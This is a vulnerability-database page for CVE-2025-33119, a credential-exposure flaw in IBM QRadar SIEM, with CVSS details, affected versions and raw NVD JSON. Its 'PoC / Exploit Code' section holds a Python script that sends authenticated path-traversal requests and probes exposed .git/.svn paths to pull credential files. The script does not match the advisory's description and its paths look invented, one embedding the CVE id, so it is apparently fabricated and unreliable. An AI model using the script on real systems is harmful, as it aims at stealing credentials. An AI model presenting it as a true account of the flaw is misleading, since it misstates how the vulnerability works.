Security Vulnerability Report
中文
CVE-2025-33119 CVSS 6.5 MEDIUM

CVE-2025-33119

Published: 2025-11-12 22:15:44
Last Modified: 2025-12-15 18:27:39
Source: [email protected]

Description

IBM QRadar SIEM 7.5 through 7.5.0 UP14 stores user credentials in configuration files in source control which can be read by an authenticated user.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:* - VULNERABLE
IBM QRadar SIEM 7.5 < 7.5.0 UP14
IBM QRadar SIEM 7.5.0 GA through 7.5.0 UP13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33119 PoC - IBM QRadar SIEM Credential Exposure # This PoC demonstrates the credential exposure vulnerability in QRadar configuration files import requests import json import base64 from urllib.parse import urljoin class QRadarCredentialExposure: def __init__(self, target_url, auth_token): self.target_url = target_url.rstrip('/') self.auth_token = auth_token self.session = requests.Session() self.session.headers.update({ 'Authorization': f'Bearer {auth_token}', 'Content-Type': 'application/json' }) def check_vulnerability(self): """Check if the target is vulnerable to CVE-2025-33119""" vulnerable_paths = [ '/console/api/server_log?filename=../config/credentials.conf', '/api/ariel/searches?filename=../../config/user_credentials.xml', '/console/qrdarun.jar?file=../../../app/qa/credentials.properties' ] exposed_credentials = [] for path in vulnerable_paths: try: response = self.session.get( urljoin(self.target_url, path), timeout=10, verify=False ) if response.status_code == 200: if 'password' in response.text.lower() or 'credential' in response.text.lower(): exposed_credentials.append({ 'path': path, 'content': response.text, 'status': 'VULNERABLE' }) except Exception as e: print(f"Error checking {path}: {str(e)}") return { 'cve_id': 'CVE-2025-33119', 'target': self.target_url, 'vulnerable': len(exposed_credentials) > 0, 'exposed_data': exposed_credentials } def extract_source_control_files(self): """Attempt to access source control configuration files""" sc_paths = [ '/api/config/backup/.git/config', '/console/api/system/.svn/entries', '/api/deployment/configs/CVE-2025-33119/credentials.conf' ] results = [] for path in sc_paths: try: response = self.session.get( urljoin(self.target_url, path), timeout=10 ) if response.status_code == 200: results.append({ 'file_path': path, 'found': True, 'size': len(response.content) }) except Exception: pass return results if __name__ == '__main__': # Usage example target = 'https://qradar-target.local' token = 'your-authentication-token' scanner = QRadarCredentialExposure(target, token) result = scanner.check_vulnerability() print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33119", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:44.247", "lastModified": "2025-12-15T18:27:38.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM QRadar SIEM 7.5 through 7.5.0 UP14 stores user credentials in configuration files in source control which can be read by an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-260"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DACA17CC-8B71-4E71-B075-BFFB65AD989C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:*", "matchCriteriaId": "BA60FDE5-8C40-4C7A-97CF-BA2A64BF307D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:*", "matchCriteriaId": "3D6ADD3A-99BC-495F-9835-92D16DF18FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:*", "matchCriteriaId": "5C899CFD-26F5-43FA-A39E-7196E2929AD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:*", "matchCriteriaId": "0C534E65-D418-4A5E-B326-F449337C0408"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13:*:*:*:*:*:*", "matchCriteriaId": "A3F6494F-EC1B-4963-908A-88190E5BF835"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_01:*:*:*:*:*:*", "matchCriteriaId": "4779E5F6-6CA5-4EF7-8C0C-DC13362DAE45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_02:*:*:*:*:*:*", "matchCriteriaId": "17894E0A-F47C-416F-99E3-26B158B5F852"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_14:*:*:*:*:*:*", "matchCriteriaId": "CD7E8A56-06DB-45AC-9769-4B198B142CAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_2:*:*:*:*:*:*", "matchCriteriaId": "AB518E06-00BA-48F3-8AEC-6E1E97CAA2CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_3:*:*:*:*:*:*", "matchCriteriaId": "289027A2-178C-45DE-A86F-1207F23D13B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_4:*:*:*:*:*:*", "matchCriteriaId": "5047AECF-879B-427A-ACF7-ECB10965E1B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_5:*:*:*:*:*:*", "matchCriteriaId": "CD448AB8-E3CC-41A1-9D32-B1B35C68FA5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_6:*:*:*:*:*:*", "matchCriteriaId": "9F4014E8-42E2-4B76-B2DA-8B50929A4AB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_7:*:*:*:*:*:*", "matchCriteriaId": "BD0A459A-C74A-4E18-83B3-4C29D47D2C2B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_8:*:*:*:*:*:*", "matchCriteriaId": "721EFDD7-EE35-430C-AF17-C54BDB10434E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_9:*:*:*:*:*:*", "matchCriteriaId": "4C3D4D7E-0B57-47E3-BD16-5BBCE05063F5"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250932", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.